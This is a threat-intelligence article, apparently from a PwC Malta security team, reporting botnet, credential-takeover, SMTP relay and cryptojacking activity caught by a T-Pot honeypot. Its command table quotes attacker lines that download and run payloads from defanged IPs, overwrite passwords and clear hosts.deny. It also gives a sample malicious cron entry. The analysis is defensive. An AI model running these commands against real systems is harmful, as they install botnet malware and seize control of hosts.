In the ever-evolving landscape of cyber security, understanding and mitigating threats is paramount. This article delves into the insights gathered from T-Pot honeypot, a sophisticated openly sourced honeypot framework, between August and October. The honeypot is designed to attract and analyse cyber threats. Our PwC Cyber Security & Privacy team deployed an in-house instance of T-Pot honeypot based in our Maltese offices. T-Pot honeypot consists of multiple decoy systems that mimic real computer environments, luring attackers into a controlled and monitored setup. By capturing and studying the actions of these attackers, T-Pot honeypot provides invaluable data that helps us understand cyber threats specifically targeting and affecting the Maltese islands. During our observations, we noticed well over 6 million attacks, of which, over 5 million were Distributed Denial of Service (DDoS) packets.
In Malta's digital landscape, the greatest threat to our security is the illusion that we are secure
Observations and Emerging Risks
Based on the data collected from our T-Pot honeypot, we observed several significant threats targeting exposed services. These threats highlight the evolving tactics used by attackers to compromise systems. The key threats identified include:
- Compromise of IoT Devices
- Credential Theft and Privilege Escalation
- Persistence Mechanisms
- Malware Deployment
- Phishing Attempts via SMTP Relay Attacks
- Cryptojacking
Compromise of IoT Devices
Attempts to deploy malware which targets IoT devices to enrol them in the Mirai botnet for use in DDoS Attacks. IoT Devices often have weak security configurations, making them prime targets for such attacks.
Credential Theft and Privilege Escalation
Efforts to manipulate passwords, indicating attempts to gain elevated access and compromise multiple accounts. This can result in attackers gaining administrative control over systems, leading to further exploitation.
Persistence Mechanisms
Ensuring payloads are reinstalled or activated even after system reboots or cleanup attempts. This allows attackers to maintain long-term access and control over the compromised systems.
Malware Deployment
Attempts to deploy various types of malware, including those used to facilitate enrolment to the GAFGYT and Mirai botnets. This can lead to further compromise.
Phishing Attempts via SMTP Relay Attacks
Potential phishing attempts using exposed relay services to send emails, leveraging ‘trusted’ infrastructure for malicious email distribution. This can lead to significant reputational damage and potential blacklisting of the mail server’s IP address.
Cryptojacking
Attempts to identify and terminate competing cryptocurrency mining processes, indicating that attackers are deploying cryptojacking malware to hijack system resources for mining cryptocurrencies.
Table of observed commands
Below is a table listing all the commands observed, along with brief descriptions of their functions:
Command |
Description |
cat /proc/cpuinfo |
The command cat /proc/cpuinfo displays detailed information about the CPU(s) on your system, including model name, clock speed, cache size, and the number of cores. This information can be useful for malicious attackers to understand the hardware capabilities of a compromised system, allowing them to optimise their malicious payloads or determine the system’s suitability for resource-intensive tasks like cryptocurrency mining. |
lscpu |
The lscpu command in Linux displays detailed information about the CPU architecture, which can be useful for threat actors to understand the system’s hardware capabilities and optimise their exploits accordingly. |
rm .s; wget http://195[.]158[.]71[.]23:50373/.i; chmod 777 .i; ./.i; exit |
This command sequence removes any existing ssh.sh file and attempts to download a new version using multiple methods (wget, curl, and TFTP). This redundancy ensures the script’s retrieval regardless of the available packages on the device. Once downloaded, it sets the script’s permissions to be fully executable and runs it with ssh as an argument. Finally, it deletes the script to erase traces of the attack. The downloaded script has been associated with malware, specifically targeting IoT devices for DDoS attacks. |
rm -rf ssh.sh; wget http://87[.]121[.]112[.]42/ssh[.]sh |
Similar to the above command we observed malicious payloads named ‘ssh.sh’ being downloaded. Analysis of the IP address associated with the file shows that it has been flagged as malicious by various security vendors. |
echo “Admin@2024\nQeqYQ3r65upv\nQeqYQ3r65upv\n” passwd |
This command uses passwd to change the password of the current user. From a security perspective, it is a method of taking over the server and achieving persistence by setting a new password. |
ps | grep ‘[Mm]iner’ |
Searches for processes containing “miner” or “Miner” in their names, making the search case-insensitive for the first letter. This is likely done to identify any cryptocurrency mining processes running on the system. |
echo > /etc/hosts.deny |
Clears existing access restrictions. |
Detailed Threat Analysis
GAFGYT Botnet
The Mirai botnet is a well-known malware strain that targets IoT devices, infecting them to execute DDoS attacks. The script downloaded from http://37[.]44[.]238[.]67/bins[.]sh is associated with the GAFGYT botnet. These scripts are designed to create hidden files, manipulate system configurations, and evade detection, aligning with typical botnet behaviour.
Recent versions of Gafgyt also incorporate a brute-force telnet scanner, copied from Mirai, as well as the GPON exploit (CVE-2018-10561), which is used to bypass authentication on vulnerable Dasan GPON routers.
IoT botnets like Gafgyt are constantly evolving. For example, researchers in March discovered what they said is the first variant of the Gafgyt botnet family that hides its activity using the Tor network and thus botnets are a threat that should not be ignored.
Source: https://truxgoservers.com/blog/gafgyt-is-a-botnet-that-uses-mirai-ddos-modules/
Mirai Botnet
The Mirai botnet is infamous for infecting Internet of Things (IoT) devices by exploiting default credentials, transforming them into a network of bots used for large-scale DDoS attacks. In contrast, the GAFGYT botnet, also known as BASHLITE, targets IoT devices by exploiting known vulnerabilities in devices like Huawei and Realtek routers. While both botnets are used for DDoS attacks, Mirai is particularly notable for its massive impact and the public release of its source code in 2016, which led to numerous variants, whereas GAFGYT has its own distinct set of exploits and has been active since 2014.
The Mirai botnet primarily targets devices running on architectures such as ARM, MIPS, and x86. Once a device is compromised, it connects to a command-and-control (C2) server, which can issue commands to launch DDoS attacks.
The infection process typically involves the following steps:
In the below-demonstrated chain of commands, we were able to determine that the first scripts enumerate the architecture of the device and once that is determined, it proceeds to download the next stage based on the specific architecture. This then captures the device and enrols it as part of the Mirai botnet.
Below is the chain of commands that was discovered:
This sequence begins by removing any existing ssh.sh file before attempting to download a new version using multiple methods, including wget, curl, and TFTP. This redundancy ensures successful retrieval regardless of the packages installed on the target device.
Once downloaded, the script sets its permissions to be fully executable, runs it with ssh as an argument, and subsequently deletes the script to cover its tracks. The script, available at http://87[.]121[.]112[.]42/ssh[.]sh, first identifies the system's binary architecture (such as MIPS, x86, ARM) and downloads the appropriate version before executing it.
The versatility and multi-method approach of this malware reflects the sophistication of the threat actor observed, indicating a targeted effort to exploit a broad range of systems. This level of sophistication underscores the importance of robust measures to detect and mitigate such threats.
Observed DoS Attacks
We also observed thousands of repeated requests from our device towards a specific domain, indicating a probable Denial of Service (DoS) attack. The attackers seemed to be probing services on a website with IP address source originating from Russia. These repeated requests were likely an attempt at a denial of service, utilising several different referrers as a source of ‘legitimacy’.
SMTP Relay Attacks
There are two types of SMTP relay services – public and authenticated.
- Public SMTP relay services are typically offered by ISPs and allow anyone to send emails through their network without the need for any authentication. While this may sound convenient, it can also be quite dangerous as it opens up the possibility of abuse, such as spamming.
- Authenticated SMTP relay services, on the other hand, require users to provide some form of credentials, usually a username and password, in order to use the service. This authentication step helps to prevent abuse and ensures that only authorised users are able to send emails through the service.
SMTP relay attacks involve exploiting mail servers to send large volumes of spam or phishing emails. Attackers can use vulnerable systems to relay emails, masking their often malicious traffic with the server's legitimate traffic, relying on the company’s reputation. This can lead to significant reputational damage and potential blacklisting of the mail server’s IP address.
The observed email addresses indicate possible phishing attempts whereby the attacker is impersonating a third-party domain to attack the target. The domain was registered in 1997 by Xin Net Technology Corporation and has been attributed to malicious activities in the past, namely scams. Attackers often use compromised SMTP servers to send phishing emails, which can contain malicious links or attachments. These emails are designed to trick recipients into revealing sensitive information or downloading malware. The use of multiple recipient addresses suggests a broad phishing campaign aimed at harvesting credentials or spreading malware.
The process typically involves:
Configuration
The attacker configures the server to relay emails to a large list of recipients.
Email Crafting
Phishing emails are crafted to appear legitimate, often mimicking trusted entities.
Distribution
The emails are sent out in bulk, aiming to reach as many recipients as possible.
Achieving the Objective
This phase largely depends on the attackers' intentions, which can vary from delivering a payload to creating a social engineering pretext, etc. Depending on the intention and the outcome, the attacker may achieve the end objective (E.g., successfully distribute malware to targets via the leveraged SMTP server)
Honeypots have been making use of AI-driven tools to detect more convincing phishing emails, making it harder for attackers to fool end-users with malicious messages that may appear legitimate.
Persistence
Attackers often use cron jobs to maintain persistence on a compromised system. By injecting malicious entries into the crontab, they ensure that their payloads are reinstalled or activated even after a system reboot or cleanup attempt. The crontab command, found in Unix and Unix-like operating systems, is used to schedule commands to be executed periodically, similar to the Windows Scheduler. This allows them to maintain control over the system and continue their malicious activities.
Persistence mechanisms are crucial for attackers to maintain long-term access to compromised systems. By leveraging cron jobs, attackers can schedule scripts to run at regular intervals, ensuring their malware remains active.
For example, a cron job entry like “* * * * * /path/to/malicious/script.sh” would execute the script every minute. This script could download additional payloads, exfiltrate data, or establish a reverse shell for remote access.
Cryptojacking
Cryptojacking involves hijacking a system’s resources to mine cryptocurrencies without the owner’s consent. The presence of commands like ps | grep '[Mm]iner' and ps -ef | grep '[Mm]iner' suggests attempts to identify and terminate competing cryptocurrency mining processes, indicating that attackers are deploying cryptojacking malware.
Cryptojacking malware typically infects a system and uses its CPU and GPU resources to mine cryptocurrencies such as Bitcoin or Monero. This can significantly degrade system performance and increase electricity costs. Attackers often use sophisticated techniques to hide their mining activities, such as running processes under legitimate system names or using rootkits to avoid detection.
The process typically involves:
Infection
The attacker gains access to the system through phishing, exploiting vulnerabilities, or using brute force attacks.
Deployment
The cryptojacking malware is downloaded and executed, often using commands like wget or curl.
Mining
The malware starts mining cryptocurrency, using the system’s resources.
Persistence
The attacker ensures the malware remains active by using persistence mechanisms such as cron jobs or modifying system binaries.
Data from the SANS Internet Storm Center indicates that cryptojacking attacks are on the rise, with attackers increasingly targeting cloud environments and containerised applications. Honeypots have detected sophisticated cryptojacking campaigns that use multiple layers of obfuscation and encryption to avoid detection.
Recently the SANS Internet Storm Center reported that they discovered a cryptojacking malware mining Monero known as the Pro Ocean cryptojacking malware. The Pro Ocean cryptojacking script exploits known vulnerabilities in software such as Apache Active MQ1 and Oracle Web logic, as well as unsecured Reddus instances, to target servers hosted within cloud providers, particularly Chinese providers like Tencent and Alibaba. Once the malware has infected a system, it not only terminates any competing malware but also halts any legitimate software that consumes significant CPU resources. This unusual behaviour could be considered as an Indicator of Compromise (IoC) and thus, identify the presence of such malware.
Tying back to our local observations where checks were being made to determine whether there were any processes with the word ‘Miner’ or ‘miner’ in it, this could be the cryptojacking malware looking to identify whether any other similar malware is being executed on the compromised system.
Contact us
